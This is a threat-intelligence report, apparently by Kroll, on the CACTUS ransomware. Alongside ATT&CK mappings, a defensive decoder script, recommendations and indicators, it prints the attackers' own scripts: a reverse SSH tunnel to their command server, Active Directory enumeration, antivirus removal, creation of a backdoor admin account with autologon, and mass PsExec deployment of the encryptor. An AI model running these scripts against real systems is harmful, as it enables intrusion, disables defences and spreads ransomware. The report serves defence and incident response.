Wed, May 10, 2023

CACTUS Ransomware: Prickly New Variant Evades Detection

 

Key Takeaways

  • Kroll has identified a new ransomware strain which we're calling CACTUS, active since at least March 2023.
  • CACTUS has been observed leveraging documented vulnerabilities in VPN appliances in order to gain initial access.
  • Once inside the network, CACTUS actors attempt to enumerate local and network user accounts in addition to reachable endpoints before creating new user accounts and leveraging custom scripts to automate the deployment and detonation of the ransomware encryptor via scheduled tasks.
  • The ransomware encryptor is novel in that it requires a key to decrypt the binary for execution, likely to prevent detection via anti-virus software. The key is provided within a file containing random text named ntuser.dat which is loaded via a scheduled task.
 

Summary

Kroll Cyber Threat Intelligence analysts have identified a new strain of ransomware, named CACTUS, targeting large commercial entities since March 2023. The name “CACTUS” is derived from the filename provided within the ransom note, cAcTuS.readme.txt, and the self-declared name within the ransom note itself. Encrypted files are appended with .cts1, although Kroll notes the number at the end of the extension has been observed to vary across incidents and victims. Kroll has observed exfiltration of sensitive data and victim extortion over the peer-to-peer messaging service known as Tox, but a known victim leak site was not identified at the time of analysis. 

In Kroll’s experience, CACTUS has deployed an overlapping set of tactics, techniques, and procedures (TTPs). These include the use of tools such as Chisel, Rclone, TotalExec, Scheduled Tasks, and custom scripts to disable security software to distribute the ransomware binary. Kroll has observed threat actors gaining initial access through exploitation of VPN appliances. Interestingly, CACTUS was observed leveraging a file named ntuser.dat within C:\ProgramData to pass an AES key to decrypt the RSA public key to decrypt the binary, which is used for persistent execution via Scheduled Tasks.

Initial Exploit

Based upon available intelligence at the time of this bulletin, the most likely Stage 1 Initial Exploit of the Kroll Intrusion Lifecycle is provided via the exploitation of vulnerable VPN appliances. This tactic has been assessed and observed being a common thread across several CACTUS incidents that Kroll has investigated. In all cases observed, the threat actor’s access was obtained from a VPN server with a VPN service account. Following this, an SSH backdoor is established to the threat actor’s command and control (C2) to maintain persistent access via Scheduled Tasks.

echo off %programdata%\sshd\ssh-keygen -f %programdata%\sshd\config\id_rsa -t rsa -N "" icacls %programdata%\sshd\config\keys\id_rsa /inheritance:r icacls %programdata%\sshd\config\keys\id_rsa /grant:r "%username%":"(R)" icacls %programdata%\sshd\config\id_rsa /inheritance:r icacls %programdata%\sshd\config\id_rsa /grant:r "%username%":"(R)" schtasks.exe /create /sc minute /mo 1 /tn "SSH Server" /rl highest /np /tr "%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config" schtasks.exe /create /sc minute /mo 1 /tn "SSH Key Exchange" /rl highest /np /tr "%programdata%\sshd\ssh.exe -i %programdata%\sshd\config\keys\id_rsa -N -R 22682:127.0.0.1:2222 -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 root@

Figure 1 – install.bat

MITRE ATT&CK - T1190: Exploit Public-Facing Application
MITRE ATT&CK - T1021.004: SSH
MITRE ATT&CK - T1053.005: Scheduled Task

Internal Scouting

Once inside the network, the threat actor conducts initial internal scouting via SoftPerfect Network Scanner (netscan). PowerShell commands are executed to enumerate endpoints, view Windows Security 4624 events to identify user accounts, and ping remote endpoints. The output from these commands is saved into text files on the host machine. The output files are later used for execution of the ransomware binary.

>>> Get-ADComputer -Filter * -Properties * | select ipv4Address > ips.txt
>>> Get-ADUser - Filter * -Properties * > users.txt
>>> Get-Eventlog -LogName Security -InstanceID 4624 | Sort-Object -Property Time -Descending | Select-Object -Property Time -ExpandProperty Message > c:\users\public\ad.txt
>>> ping 

Figure 2 – PowerShell Enumeration

Kroll has also identified a modified version of an open-sourced script which acts as an NMAP equivalent for PowerShell, named PSnmap.ps1. This is also executed to identify other endpoints within the network.

MITRE ATT&CK - T1049: System Network Connections Discovery
MITRE ATT&CK - T1087.002: Domain Account
MITRE ATT&CK - T1018: Remote System Discovery
MITRE ATT&CK - T1087: Account Discovery

Toolkit Deployment

To maintain persistence within the environment, the threat actor attempts to create a number of remote access methods. Kroll has identified the use of legitimate remote access tools such as Splashtop, AnyDesk and SuperOps RMM, along with Cobalt Strike and the use of Chisel, a SOCKS5 proxy tool. Chisel assists with tunnelling traffic through firewalls to provide hidden communications to the threat actor’s C2 and is likely used to pull additional scripts and tooling onto the endpoint. 

Once the threat actor has established the correct level of access (see: Escalation), they then execute a batch script which leverages msiexec to uninstall common anti-virus software via the software GUID, and in at least one (1) incident, the Bitdefender uninstaller as shown in Figure 3.

TASKKILL /F /IM msiexec.exe
msiexec.exe /x {3E8909A1-55FD-46C4-8FC0-604313331AA2} /QN /norestart
msiexec.exe /x {36E5BC45-019B-49A5-A722-E64FF83AE375} /QN /norestart
msiexec.exe /x {9B5749A2-35AE-435C-BF34-51884160AB09} /QN /norestart
<…snip…>
c:\windows\BEST_uninstallTool.exe /bdparams
del "%~f0"

Figure 3 – Section of Batch Script to Disable Anti-Virus

MITRE ATT&CK - T1219: Remote Access Software
MITRE ATT&CK - T1090: Proxy
MITRE ATT&CK - T1562.001: Disable or Modify Tools

Escalation

To gain credentials sufficient for execution and lateral movement, the threat actor has commonly attempted to dump credentials from user web browsers and manually searching the disk for a file containing passwords. Additionally, they may also attempt LSASS credential dumping for later privilege escalation. A further batch script is then leveraged to add privileged accounts to remote endpoints. This activity is discussed later in the report.

@echo off
net user Adm1nBac P@ssW0dDP@ssW /add
net user Adm1nBac /active:yes
net localgroup Administrators Adm1nBac /add
bcdedit /set {default} safeboot minimal
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeText /t REG_SZ /d "" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeCaption /t REG_SZ /d "" /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Adm1nBac /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d P@ssW0dDP@ssW /f
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoLogonCount /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "*!test" /t REG_SZ /d "C:\windows\f2.bat" /f
shutdown -r -f -t 5
del "%~f0"

Figure 4 – f1.bat Adding Local Admin Accounts

MITRE ATT&CK - T1136: Create Account
MITRE ATT&CK - T1555.003: Credentials from Web Browsers
MITRE ATT&CK - T1003: OS Credential Dumping

Lateral Movement

Lateral movement has been observed being conducted by valid or created accounts and the remote desktop protocol (RDP). However, remote management tools such as Super Ops have also been used for lateral movement. 

MITRE ATT&CK - T1021.001: Remote Desktop Protocol  
MITRE ATT&CK - T1072: Software Deployment Tools

Mission Execution / Ransomware

As with many ransomware groups, CACTUS actors also attempt to exfiltrate sensitive data to increase the pressure of extortion. Kroll has observed common exfiltration tools such as Rclone, being used to automatically extract files to cloud storage. 

MITRE ATT&CK - T1567.002: Exfiltration to Cloud Storage

Once data has been exfiltrated, the threat actor begins to prepare to encrypt devices. Utilizing a script often leveraged by BLACKBASTA known as TotalExec.ps1 which uses PsExec to automate the deployment of the encryptor and this case, the f1.bat script shown in Figure 4 and f2.bat shown in Figure 5. As previously discussed, the batch script f1.bat is deployed first to create a new admin user account which then adds a second script named f2.bat as an autorun at the machine level before restarting the device. The f2.bat can be seen in Figure 6, shows a batch script used to extract the ransomware encryptor binary with 7zip before then removing the zip file and executing the binary with a set flag which enables the binary to execute. This is then executed remotely by PsExec across the list of devices in the ips.txt file created earlier.

powershell.exe -ex bypass -nop -file totalexec.ps1 -CMD c:\windows\f1.bat -ACC .\admin1234 -SECR Pa$$w0rd12321 -EXE f1.bat,f2.bat,.7z,7.exe -LIST ips.txt -JOBS 10 -CHUNK 10 -WAIT 5

Figure 5 – TotalExec.ps1 Execution

@echo off
SETLOCAL EnableExtensions
bcdedit /deletevalue {default} safeboot
C:\Windows\7.exe x C:\Windows\.7z -p1234 -o"C:\Windows"
del C:\Windows\7.exe
del C:\Windows\.7z
C:\Windows\.exe -i
SET EXE=.exe
:Running
FOR /F %%x IN ('tasklist /NH /FI "IMAGENAME eq %EXE%"') DO IF NOT %%x == %EXE% (
  ECHO %EXE% is Not Running
  GOTO notRunning
) ELSE (
  ECHO %EXE is running
timeout /t 10
 GOTO Running
)
...
:notRunning
  ECHO %EXE% is Not Running
del C:\Windows\.exe
shutdown -r -t 5 -c "Computer Will Now Restart In NORMAL MODE..."
del "%~f0"

Figure 6 – f2.bat Execution of Ransomware Encryptor Binary

The binary itself is interesting, it is usually named the same as the individual victim ID that is used for negotiations and that is normally structured in regex [a-z1-9]{4}-[a-z1-9]{4}-[a-z1-9]{4}-[a-z1-9]{4}\.exe for example “a12b-e4fg-c12g-zkc2.exe” where the name before the “.exe” acts as the victim ID. 

The UPX packed executable has 3 main modes of execution controlled by command line switches. A full flow of the execution process can be seen in Figure 16.

Setup Mode

This mode is triggered by being passed a “-s” flag on the command line and its purposes is to set itself up as persistence and then call itself again during the next mode.

In this mode it will copy its own executable file to the C:\ProgramData\{Victim_ID}.exe for example:  C:\ProgramData\abc1-d2ef-gh3i-4jkl.exe. 

The ransomware then writes a junk data wrapped, hexadecimal encoded config file to C:\ProgramData\ntuser.dat containing the path to the original exe, a base64 string that was the passed in with the “–i” command line argument with any remaining command line arguments. The hexadecimal string is further obfuscated by pushing the alignment of each two-character byte representation out by one character.

Ransomware Cactus Evades Detection

Figure 7 – First 100 bytes of C:\ProgramData\ntuser.dat 

Ransomware Cactus Evades Detection

Figure 8 - Data of C:\ProgramData\ntuser.dat with Standard Hex Decoding

Ransomware Cactus Evades Detection

Figure 9 - Data of C:\ProgramData\ntuser.dat with Hex Decoding and Adjusted Alignment

Ransomware Cactus Evades Detection

Figure 10 - Ransomware Configuration Hidden Amongst Junk Text Extracted from C:\ProgramData\ntuser.dat

Once CACTUS has created the ntuser.dat file, it proceeds to create and execute a scheduled task that runs command C:\ProgramData\{Victim_ID}.exe -r 

The setup CACTUS process now terminates.

Read Configuration Mode

When being called from the scheduled task with the “-r” option the ransomware reads the ntuser.dat file and extracts the three fields.

The CACTUS process then deletes the executable file referenced in the first field. It then spawns another instance of itself passing in the second field as the parameter to the “–i” option, and then appends the third field which contains any remaining arguments to the command line.

The Read Configuration Mode Cactus instances now exits.

Encryption Mode

When the Ransomware is spawned without the -s or -r parameters it will attempt file system encryption. The malware decodes a hardcode hex string. This hex string can easily be found within the binary once it has been unpacked.

Ransomware Cactus Evades Detection

Figure 11 – Hex String

Once it has decoded the hex string it then proceeds to decrypt the resulting data using the AES algorithm with the “-i” parameter and a hardcoded initialization vector. The resulting plain text is loaded into a Public RSA key object.

Ransomware Cactus Evades Detection

Figure 12 – AES Decryption of Public RSA Key

The malware then searches the filesystem for files and starts multiple threads to encrypt them. In order to encrypt a large number of files efficiently it uses OpenSSL’s envelope implementation from a statically linked function. First, a random AES key is generated to encrypt a file, then the AES key itself is encrypted by the public RSA key. This creates an “envelope” which contains the AES encrypted file and the RSA encrypted AES key. Therefore, to decrypt the file, the private RSA key is required to extract the AES key.

Ransomware Cactus Evades Detection

Figure 13 – File Encryption Process

Ransomware Cactus Evades Detection

Figure 14 – File Encryption with AES, RSA and OpenSSL

The malware continues to encrypt files until completion.

Once executed files are appended with the extension “cts\d” with the last character being an interchangeable digit. A ransom note is then created named “cAcTuS.readme.txt” with details on how the victim can negotiate over TOX chat. Most ransomware groups list a shaming site, however this has not been identified at this time, nor has any other area of data disclosure.

Ransomware Cactus Evades Detection

Figure 15 – CACTUS Ransom Note

As of the writing of this bulleting, Kroll had not yet identified a "shaming site" or victim identification-related blog authored by CACTUS for purposes of sharing victim data if a ransom was not paid. In terms of ransom, there is not currently enough data to provide an average starting price. It is also yet to be seen what would happen if a ransom were not paid and how successful any threat actor provided decryptor may be.

MITRE ATT&CK - T1027.002: Software Packing
MITRE ATT&CK - T1486: Data Encrypted for Impact
MITRE ATT&CK - T1027: Obfuscated Files or Information
MITRE ATT&CK - T1570: Lateral Tool Transfer

A Prickly New Ransomware, Cactus, Evades Detection

Figure 16 – Ransomware Binary Execution

Decode ntuser.dat

Kroll have provided a simple python script to decode the ntuser.dat file associated with CACTUS.

import sys
import re
f=None
 
try:
  f=open(sys.argv[1]);
except:
  print("Problem Opening file")
  print("Usage: python3 decode.py file_to_decode")
  print("Example: python3 decode.py ntuser.dat")
  sys.exit(1)
 
 
character_alignment=1   
datastart='[cCdD]:\\\\' # Data Starts with a path to executable
seperator='\|'          # Uses pipe character end of field
 
buffer=f.read()[character_alignment:]
 
l=len(buffer)
c=0
tmpstr=""
 
while c < l:
    hex_byte=buffer[c:c+2].upper()
    ch=chr(int(hex_byte, 16))
    tmpstr=tmpstr+""+str(ch)
    c+=2
 
extracted=re.search(r''+datastart+'.*'+seperator,tmpstr)
if extracted:
    print(extracted.group())
else: # fall back to dump of all text
    print(tmpstr) 

Mitre ATT&CK Mapping

Tactic Technique Procedure

TA0001

 T1190

Exploit Public-Facing Application

TA0002

 T1059

Command and Scripting Interpreter

 T1053.005

Scheduled Task

 T1072

Software Deployment Tools

TA0003

T1053.005

Scheduled Task

T1136

Create Account

TA0004

T1053.005

Scheduled Task

TA0005

T1562.001

Disable or Modify Tools

T1027.002

Software Packing

T1027

Obfuscated Files or Information

TA006

T1555.003

Credentials from Web Browsers

T1003

OS Credential Dumping

TA0007

T1049

System Network Connections Discovery

T1087.002

Domain Account

T1087

Account Discovery

T1018

Remote System Discovery

TA0008

T1021.001

Remote Desktop Protocol

T1072

Software Deployment Tools

T1570

Lateral Tool Transfer

TA0009

T1119

Automated Collection

TA0010

T1567.002

Exfiltration to Cloud Storage

TA0011

T1219

Remote Access Software

T1090

Proxy

TA0040

T1486

Data Encrypted for Impact

Recommendations

Kroll has identified recommendations relating to this alert:

Recommendation
Observation
Patch and update VPN Devices
It is likely that initial access is provided by VPN appliances
Implement Password Managers
The threat actor was able extract credentials from the browser

Monitor PowerShell Execution
Ensure PowerShell is logged and create detections for encoded script execution

The threat actor utilized PowerShell execution

Audit User, Administrator and Service Accounts
Ensure accounts have the correct access and privileges. Implement the principle of least privilege.

The exploitation allowed the threat actor to operate with a highly privileged account which could add extra administrator accounts.

Implement Multi-factor Authentication
Multi-factor authentication can restrict access to sensitive areas and can prevent lateral movement.

The threat actor was able to access all areas of the network. Implementing multi-factor authentication would assist with limiting lateral movement and access to sensitive areas

Review Backup Strategies
Ensure multiple backups are taken and at least one backup is isolated from the network.

This allows for an organization to quickly restore if they are impacted.

For Kroll Responder Customers

Kroll's threat intelligence team has created and deployed detection rules for CACTUS. If you have any questions, please contact your technical account manager or submit a support ticket.

If you're unsure about your detection capabilities for CACTUS (or any other ransomware variant), get in touch with a Kroll expert today.

 

Indicators of Compromise

The following files and hashes have been identified for the incident.

File Name
Comment
MD5 Hash Value
AnyDesk.exe
Remote Access Tool
d9f15227fefb98ba69d98542fbe7e568
psnb.ps1
PowerShell NMAP
3adc612b769a2b1d08b50b1fb5783bcf
conhost.exe
Chisel
be7b13aee7b510b052d023dd936dc32f
Totalexec.ps1
PsExec script
26f3a62d205004fbc9c76330c1c71536
f1.bat
Admin User Creation
d5e5980feb1906d85fbd2a5f2165baf7
f2.bat
Ransomware Execution
78aea93137be5f10e9281dd578a3ba73

The following external IP addresses were observed during the incident:

IP Address
Comment
163.123.142.213
Cobalt Strike

Cyber Risk

Incident response, digital forensics, breach notification, managed detection services, penetration testing, cyber assessments and advisory.

Kroll Responder MDR

Stop cyberattacks. Kroll Responder managed detection and response is fueled by seasoned IR experts and frontline threat intelligence to deliver unrivaled response.

24x7 Incident Response

Kroll is the largest global IR provider with experienced responders who can handle the entire security incident lifecycle.


Cyber Risk Retainer

Kroll delivers more than a typical incident response retainer—secure a true cyber risk retainer with elite digital forensics and incident response capabilities and maximum flexibility for proactive and notification services.

Ransomware Preparedness Assessment

Kroll’s ransomware preparedness assessment helps your organization avoid ransomware attacks by examining 14 crucial security areas and attack vectors.

Data Recovery and Forensic Analysis

Kroll's expertise establishes whether data was compromised and to what extent. We uncover actionable information, leaving you better prepared to manage a future incident.


Computer Forensics

Kroll's computer forensics experts ensure that no digital evidence is overlooked and assist at any stage of an investigation or litigation, regardless of the number or location of data sources.

Business Email Compromise (BEC) Response and Investigation

In a business email compromise (BEC) attack, fast and decisive response can make a tremendous difference in limiting financial, reputational and litigation risk. With decades of experience investigating BEC scams across a variety of platforms and proprietary forensic tools, Kroll is your ultimate BEC response partner.

Incident Remediation and Recovery Services

Cyber incident remediation and recovery services are part of Kroll’s Complete Response capabilities, expediting system recovery and minimizing business disruption.


Penetration Testing Services

Validate your cyber defenses against real-world threats. Kroll’s world-class penetration testing services bring together front-line threat intelligence, thousands of hours of cyber security assessments completed each year and a team of certified cyber experts — the foundation for our sophisticated and scalable approach.